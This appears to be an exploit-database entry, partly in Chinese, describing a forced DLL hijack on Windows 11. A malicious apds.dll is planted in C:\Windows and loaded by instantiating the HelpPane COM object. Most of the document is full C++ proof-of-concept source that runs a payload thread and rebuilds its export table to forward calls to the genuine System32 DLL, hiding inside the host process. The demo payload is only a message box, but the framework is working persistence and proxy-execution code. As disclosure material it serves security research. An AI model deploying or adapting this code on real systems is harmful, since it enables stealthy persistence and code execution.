
Microsoft Windows 11 - 'apds.dll' DLL Hijacking (Forced)

#--------------------------------------------------------------------------------------------------
# Exploit Title: Microsoft Windows 11 - 'apds.dll' DLL Hijacking (Forced)
# 日期: 2023-09-01
# 作者: Moein Shahabi
# Vendor: https://www.microsoft.com
# 版本: Windows 11 Pro 10.0.22621
# 测试环境: Windows 11 x64 [ENG]
#--------------------------------------------------------------------------------------------------
Description:
HelpPane 对象允许我们强制 Windows 11 加载被劫持的 apds.dll:将恶意 DLL 以 apds.dll 为名放入 C:\Windows\ 目录后,实例化 HelpPane 对象即可触发加载。恶意 DLL 会把自身的导出表代理到真实的 System32\apds.dll,以避免宿主进程因缺少导出而出错。
说明:
1。编译 DLL(位数需与宿主一致,测试环境为 x64),输出文件命名为 apds.dll
2。复制到 "C:\Windows\" 目录。注意:向该目录写入文件通常需要管理员权限,因此这更适合作为持久化/代理执行(signed-binary proxy execution)手段,而不构成跨安全边界的权限提升。
3。启动 CMD/PowerShell,执行以下命令实例化 HelpPane 对象以触发加载:
   powershell -c "[System.Activator]::CreateInstance([type]::GetTypeFromCLSID('<HelpPane 的 CLSID>'))"
   (本页原文中的 CLSID 已被截断,请在注册表 HKCR\CLSID 下查找 HelpPane 对应的 CLSID 后填入)
4。若弹出 "DLL Hijacking!" 消息框,说明恶意 DLL 已在 HelpPane 进程中加载并执行。
----- code_poc -------------------
#pragma once
#include <windows.h>
#include <string.h>
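// Payload thread: pops a message box so a successful hijack is visible.
// It is exported (presumably so the payload can also be invoked directly);
// the export is not used by the proxying logic itself.
//
// lpParam: unused (DllMain passes NULL).
// Returns 0 as the thread exit code.
extern "C" __declspec(dllexport)
DWORD WINAPI MessageBoxThread(LPVOID lpParam)
{
    UNREFERENCED_PARAMETER(lpParam);

    // Call the wide-char entry point explicitly: the L"" literals would not
    // compile through the MessageBox macro if UNICODE were not defined.
    // MB_OK is the explicit flag value instead of NULL for the UINT uType.
    MessageBoxW(NULL, L"DLL Hijacking!", L"DLL Hijacking!", MB_OK);
    return 0;
}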
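// Allocate `size` bytes that can be referenced by a 32-bit RVA from the module
// loaded at `baseAddress`.
//
// PE export tables store DWORD RVAs, so on x64 the rebuilt tables must live
// within 4 GiB above the module base: we probe upwards from the end of the
// mapped image until VirtualAlloc accepts an address. On x86 the whole address
// space is RVA-reachable, so any address will do.
//
// baseAddress : base of our own module (points at its IMAGE_DOS_HEADER)
// size        : number of bytes to commit
// protection  : initial page protection (default PAGE_READWRITE)
// Returns the committed block, or NULL if no suitable address was found.
// Pages committed by VirtualAlloc are zero-initialised, so no explicit
// ZeroMemory is needed.
PBYTE AllocateUsableMemory(PBYTE baseAddress, DWORD size, DWORD protection = PAGE_READWRITE)
{
#ifdef _WIN64
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader;

    // A reservation at an explicit address is rounded down to the allocation
    // granularity (normally 64 KiB); probing at a finer step only repeats the
    // attempt inside the same granule, so step by the granularity itself.
    SYSTEM_INFO systemInfo;
    GetSystemInfo(&systemInfo);
    SIZE_T step = systemInfo.dwAllocationGranularity ? systemInfo.dwAllocationGranularity : 0x10000;

    // Start just past the mapped image so we never collide with our own sections.
    PBYTE start = baseAddress + optionalHeader->SizeOfImage;

    // Highest start address at which the *whole* block still ends within RVA
    // range, i.e. (ptr + size - baseAddress) fits in a DWORD.
    PBYTE limit = baseAddress + MAXDWORD - size;

    for (PBYTE offset = start; offset <= limit; offset += step) {
        PBYTE usable = (PBYTE)VirtualAlloc(offset, size, MEM_RESERVE | MEM_COMMIT, protection);
        if (usable)
            return usable;
    }
#else
    // x86: any address is RVA-reachable, let the kernel pick one.
    PBYTE usable = (PBYTE)VirtualAlloc(NULL, size, MEM_RESERVE | MEM_COMMIT, protection);
    if (usable)
        return usable;
#endif
    return NULL;
}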
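// Rebuild our own export directory so that every named export of `targetBase`
// is re-exported by `ourBase` (the proxy) under the same name and name-ordinal,
// each resolving to a small absolute-jump stub that lands in the genuine
// implementation inside the target module.
//
// Layout of the side allocation (one contiguous block, made RX at the end):
//   [function RVA table][jmp stubs...][name RVA table][name strings...][name-ordinal table]
// All of it is referenced from our IMAGE_EXPORT_DIRECTORY via RVAs, which is
// why the block has to be RVA-reachable (see AllocateUsableMemory).
//
// ourBase    : the proxy DLL (this module)
// targetBase : the genuine DLL whose exports are to be forwarded
// Returns TRUE on success; FALSE if either module lacks an export directory,
// if the target has unnamed (ordinal-only) exports, or if an allocation or a
// protection change fails. On failure nothing in our header has been modified.
//
// Known limitations:
//  - targets with NumberOfFunctions != NumberOfNames are rejected;
//  - forwarder entries in the target (RVAs that point back into its export
//    directory) are not recognised; a stub for one would jump into a string;
//  - the target must stay mapped for the life of the process, since the stubs
//    embed absolute addresses inside its image.
BOOL ProxyExports(HMODULE ourBase, HMODULE targetBase)
{
#ifdef _WIN64
    const BYTE jmpPrefix[] = { 0x48, 0xB8 }; // mov rax, imm64
    const BYTE jmpSuffix[] = { 0xFF, 0xE0 }; // jmp rax
#else
    const BYTE jmpPrefix[] = { 0xB8 };       // mov eax, imm32
    const BYTE jmpSuffix[] = { 0xFF, 0xE0 }; // jmp eax
#endif
    const DWORD stubSize = (DWORD)(sizeof(jmpPrefix) + sizeof(LPVOID) + sizeof(jmpSuffix));

    // --- locate the target's export directory --------------------------------
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetBase;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    PIMAGE_DATA_DIRECTORY exportDataDirectory =
        &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (exportDataDirectory->Size == 0)
        return FALSE; // nothing to forward

    PIMAGE_EXPORT_DIRECTORY targetExportDirectory =
        (PIMAGE_EXPORT_DIRECTORY)((PBYTE)targetBase + exportDataDirectory->VirtualAddress);
    if (targetExportDirectory->NumberOfFunctions != targetExportDirectory->NumberOfNames)
        return FALSE; // TODO: support DLLs with ordinal-only / gapped export tables

    const DWORD count = targetExportDirectory->NumberOfFunctions;
    // RVAs are unsigned; PDWORD avoids sign issues that PINT would introduce.
    const PDWORD targetAddressOfFunctions    = (PDWORD)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions);
    const PDWORD targetAddressOfNames        = (PDWORD)((PBYTE)targetBase + targetExportDirectory->AddressOfNames);
    const PWORD  targetAddressOfNameOrdinals = (PWORD)((PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals);

    // --- locate our own export directory -------------------------------------
    dosHeader = (PIMAGE_DOS_HEADER)ourBase;
    ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    exportDataDirectory = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (exportDataDirectory->Size == 0)
        return FALSE; // our DLL must export at least one symbol for the directory to exist

    PIMAGE_EXPORT_DIRECTORY ourExportDirectory =
        (PIMAGE_EXPORT_DIRECTORY)((PBYTE)ourBase + exportDataDirectory->VirtualAddress);

    // --- size the side allocation --------------------------------------------
    DWORD totalAllocationSize = 0;
    totalAllocationSize += count * sizeof(DWORD);   // function RVA table
    totalAllocationSize += count * stubSize;        // jmp stubs
    totalAllocationSize += count * sizeof(DWORD);   // name RVA table
    for (DWORD i = 0; i < count; i++)               // NUL-terminated name strings
        totalAllocationSize += (DWORD)strlen((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i])) + 1;
    totalAllocationSize += count * sizeof(WORD);    // name-ordinal table

    PBYTE sideAllocation = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE);
    if (!sideAllocation)
        return FALSE;
    PBYTE cursor = sideAllocation;

    // --- function RVA table + jmp stubs --------------------------------------
    // Every slot is written in the loop below, so the target's table is not
    // copied first (the original copied the *name* table here and then
    // overwrote it, which was merely confusing).
    PDWORD newFunctionTable = (PDWORD)cursor;
    cursor += count * sizeof(DWORD);

    for (DWORD i = 0; i < count; i++) {
        newFunctionTable[i] = (DWORD)(cursor - (PBYTE)ourBase);

        // NOTE(review): a forwarder entry would not be detected here — this
        // assumes the target exports only real code addresses; confirm for apds.dll.
        PBYTE realAddress = (PBYTE)targetBase + targetAddressOfFunctions[i];

        CopyMemory(cursor, jmpPrefix, sizeof(jmpPrefix));
        cursor += sizeof(jmpPrefix);
        CopyMemory(cursor, &realAddress, sizeof(LPVOID));
        cursor += sizeof(LPVOID);
        CopyMemory(cursor, jmpSuffix, sizeof(jmpSuffix));
        cursor += sizeof(jmpSuffix);
    }

    // --- name RVA table + strings --------------------------------------------
    PDWORD newNameTable = (PDWORD)cursor;
    cursor += count * sizeof(DWORD);

    for (DWORD i = 0; i < count; i++) {
        LPCSTR name = (LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]);
        SIZE_T length = strlen(name) + 1; // include the terminating NUL
        CopyMemory(cursor, name, length);
        newNameTable[i] = (DWORD)(cursor - (PBYTE)ourBase);
        cursor += length;
    }

    // --- name-ordinal table (same count as names, checked above) --------------
    PWORD newOrdinalTable = (PWORD)cursor;
    CopyMemory(newOrdinalTable, targetAddressOfNameOrdinals, count * sizeof(WORD));
    cursor += count * sizeof(WORD);

    // --- point our export directory at the rebuilt tables --------------------
    // The directory sits in a read-only header page. It is patched only after
    // everything else succeeded, and left RW for as short a window as possible.
    DWORD oldProtect = 0;
    if (!VirtualProtect(ourExportDirectory, sizeof(IMAGE_EXPORT_DIRECTORY), PAGE_READWRITE, &oldProtect))
        return FALSE;

    ourExportDirectory->AddressOfFunctions    = (DWORD)((PBYTE)newFunctionTable - (PBYTE)ourBase);
    ourExportDirectory->AddressOfNames        = (DWORD)((PBYTE)newNameTable - (PBYTE)ourBase);
    ourExportDirectory->AddressOfNameOrdinals = (DWORD)((PBYTE)newOrdinalTable - (PBYTE)ourBase);
    ourExportDirectory->NumberOfFunctions     = count;
    ourExportDirectory->NumberOfNames         = count;

    DWORD ignored = 0;
    if (!VirtualProtect(ourExportDirectory, sizeof(IMAGE_EXPORT_DIRECTORY), oldProtect, &ignored))
        return FALSE;

    // --- drop write access to the stubs: never leave a W+X mapping behind ----
    if (!VirtualProtect(sideAllocation, totalAllocationSize, PAGE_EXECUTE_READ, &ignored))
        return FALSE;
    FlushInstructionCache(GetCurrentProcess(), sideAllocation, totalAllocationSize);

    return TRUE;
}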
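// DLL entry point. On process attach: start the payload thread, load the
// genuine apds.dll from System32 and rebuild our export table to forward to
// it, so a host that loaded the planted copy still resolves the real exports.
//
// Caveats:
//  - LoadLibrary and CreateThread are called under the loader lock. Microsoft
//    documents this as unsupported from DllMain (deadlock risk); it works for
//    this PoC but is not something production code should rely on.
//  - realDll is intentionally never freed: the stubs written by ProxyExports
//    embed absolute addresses inside its image, so it must stay mapped.
//  - TRUE is returned even if proxying fails, so the payload still runs; in
//    that case the host's GetProcAddress calls on our exports will fail.
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    UNREFERENCED_PARAMETER(lpReserved);

    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        // Nothing is done on thread attach/detach, so skip those notifications.
        DisableThreadLibraryCalls(hModule);

        HANDLE hThread = CreateThread(NULL, 0, MessageBoxThread, NULL, 0, NULL);
        if (hThread)
            CloseHandle(hThread); // never joined; closing the handle does not stop the thread

        // Resolve the real DLL from the System32 directory only. This avoids a
        // hard-coded system drive letter, and it avoids the default search order
        // finding *this* planted copy (which lives next to the host in C:\Windows)
        // and proxying our exports to ourselves.
        HMODULE realDll = LoadLibraryExW(L"apds.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
        if (realDll)
            ProxyExports(hModule, realDll);
    }
    return TRUE;
}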
--------------------------------------------------
 